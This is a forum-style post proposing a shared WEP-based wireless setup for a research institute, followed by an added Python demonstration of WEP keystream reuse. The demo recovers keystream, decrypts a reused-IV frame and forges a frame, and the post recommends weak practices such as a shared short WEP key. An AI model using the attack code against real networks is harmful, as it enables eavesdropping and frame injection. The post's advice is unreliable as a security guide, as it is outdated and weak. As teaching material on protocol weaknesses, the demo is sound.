I was talking to Quyen and Todd, and we came up with a short, easy-to-follow preliminary wireless security idea. I decided to post this to the group and see what you guys thought. If you think it's a good idea, maybe we can all follow it. Of course, this is only for people who wish to make their wireless access points available to everyone at the OMRF. I don't know how much of this is already implemented, so I could be echoing someone's already-implemented ideas. I'll call that "delayed synchronicity" so it sounds better than "duh".

Here's the idea:

- All wireless base stations that are intended for OMRF use have the same community name, and the community names are set to broadcast (i.e. not a "closed network", as several systems call it).
- If we use a WEP password, we all use the same WEP key, and make it easy to remember (preferably 48-bit, as that seems to be the most common denominator for all 802.11b wireless cards).
- All base stations have a unique password, preferably totally random and not easy to remember (example that is somewhat like what we use: a48b9_R). Every base station would have its password written on a piece of paper taped to the base station.

Alright, this looks like really bad security. It's not quite so bad as it seems, and it still meets our requirements for being easy to use. Let me explain:

First, the community name can be picked up off the wire easily unless we use some sort of junk broadcaster, so why not broadcast it? We want our users to be able to find it easily. Also, this makes it to where we can walk across the OMRF and not have to adapt to the local fiefdom just to get network access.

Second, if we have a shifting WEP password, many systems will not let you store multiple WEP passwords for the same community, therefore we'll constantly be futzing with the thing, and it will be far more likely that someone will take to posting all the passwords, and we're just back to where we were. Also, WEP at the levels that we will have access to (48-bit, if we want to allow everyone to use the network) is a trivial crack for someone who wants in (i.e. is sufficiently bored or interested), so this is mostly for keeping people out who wander in by accident, or just want to tap in on a lark. Besides, network-level security should not be our only line of defense.

As for the base stations: what we're really concerned about is someone who does not have access to the lab getting in and messing with the controls of our access points. To get the password for the access point, someone would have to have physical access to the lab and have the desire to learn the password. As the password is random, it is not something you just look at and know, hence they would have to intend to break in when they looked at the password. Not great security, but not awful. The reason for giving out the password at all is so that others can come in and fix your access point if it misbehaves without unplugging it or resetting it. If your access point is set to run a DHCP server, you will earn the concern if not the ire of the network boys (understandably). Not that I know anyone who's done that (cough, cough). The main system administrators and people who have a good reason to be there can get physical access to where the AP is at all times. This easily gets them the ability to manage instead of blow away your access point.

Now, why not use the same password for all APs? We could do that, but then everyone who ran an AP would have the password for all other APs for ever and ever. Not to mention we'd have to take precautions about whom we give passwords to, and anyone who had the password would be responsible for the entire OMRF. And it smacks of centralization, and there's really no need for that.

So, that's the idea. Todd, Quyen, any corrections? Anyone else: any suggestions? Anyone interested in doing this? Any proposed community names, WEP keys?
Happy to help (or at least cause problems), Alan
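The post above calls a short shared WEP key "a trivial crack" and treats it as a speed bump only. The following is an added illustration of why that is true, and it goes a step further than the post's point about key length: WEP is weak even with a long key, because the 24-bit IV is sent in the clear and every frame that reuses an IV under the same key reuses the same RC4 keystream. This is example code written for this page, not code from Alan or from the OMRF setup; the 5-byte key (40-bit, usually marketed as 64-bit WEP), the IV, and the two frames are all constructed for the demo, and the "known" frame stands in for any traffic whose plaintext an attacker can guess (ARP, DHCP, a broadcast with predictable headers).

```python
"""WEP keystream-reuse demo (added example, not from the original post).

A WEP frame on the air is  IV || ( RC4(IV || key) XOR (data || CRC32(data)) ).
The 3-byte IV is cleartext, so two frames with the same IV under the same key
are XORed with the same keystream.  Knowing the plaintext of one of them gives
the attacker that keystream, and with it every other frame carrying that IV can
be decrypted or forged without ever learning the WEP key.
All keys, IVs and frames below are constructed for the demo.
"""
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key-scheduling, then `length` bytes of keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                    # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the data, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """What the card sends: IV || RC4(IV||key) XOR (data || ICV)."""
    assert len(iv) == 3
    plaintext = data + icv(data)
    return iv + xor(rc4_keystream(iv + key, len(plaintext)), plaintext)


def wep_decrypt(key: bytes, frame: bytes):
    """What the AP does: decrypt, check the ICV, return data or None."""
    iv, body = frame[:3], frame[3:]
    plaintext = xor(rc4_keystream(iv + key, len(body)), body)
    data, tag = plaintext[:-4], plaintext[-4:]
    return data if icv(data) == tag else None


# ---- attacker side: no key needed from here on ---------------------------

def recover_keystream(frame: bytes, known_data: bytes) -> bytes:
    """Keystream for this frame's IV = ciphertext XOR known plaintext."""
    return xor(frame[3:], known_data + icv(known_data))


def decrypt_with_keystream(ks: bytes, frame: bytes):
    """Decrypt another frame that reused the IV; None if keystream is too short."""
    body = frame[3:]
    if len(body) > len(ks):
        return None
    data = xor(body, ks[: len(body)])[:-4]     # drop the ICV
    return data


def forge_with_keystream(ks: bytes, iv: bytes, data: bytes) -> bytes:
    """Build a frame the AP will accept as valid, using only the keystream."""
    plaintext = data + icv(data)
    if len(plaintext) > len(ks):
        raise ValueError("need a longer known frame to forge this much data")
    return iv + xor(ks[: len(plaintext)], plaintext)


def demo():
    key = b"a48b9"                      # constructed 5-byte (40-bit) WEP key
    iv = b"\x01\x02\x03"                # same IV reused for two frames
    # Plaintext the attacker can predict (e.g. an ARP request), padded so the
    # recovered keystream is long enough to cover the frame we actually want.
    known = b"ARP who-has 10.0.0.1 tell 10.0.0.2" + b"\x00" * 20
    secret = b"POST /admin password=hunter2"
    frame_known = wep_encrypt(key, iv, known)
    frame_secret = wep_encrypt(key, iv, secret)

    ks = recover_keystream(frame_known, known)          # attacker
    recovered = decrypt_with_keystream(ks, frame_secret)  # reads the secret
    forged = forge_with_keystream(ks, iv, b"reboot")     # and injects a frame
    accepted = wep_decrypt(key, forged)                  # AP accepts it
    return recovered, accepted


if __name__ == "__main__":
    print(demo())
```

With a 24-bit IV space, a busy link repeats an IV after only a few thousand frames on average (the birthday bound for 2^24 values is about 5,000), and many cards simply count IVs up from zero on each reset, so the attacker waits rather than brute-forces. This is orthogonal to the per-AP random admin password in the post: that password protects the management interface, not the air link.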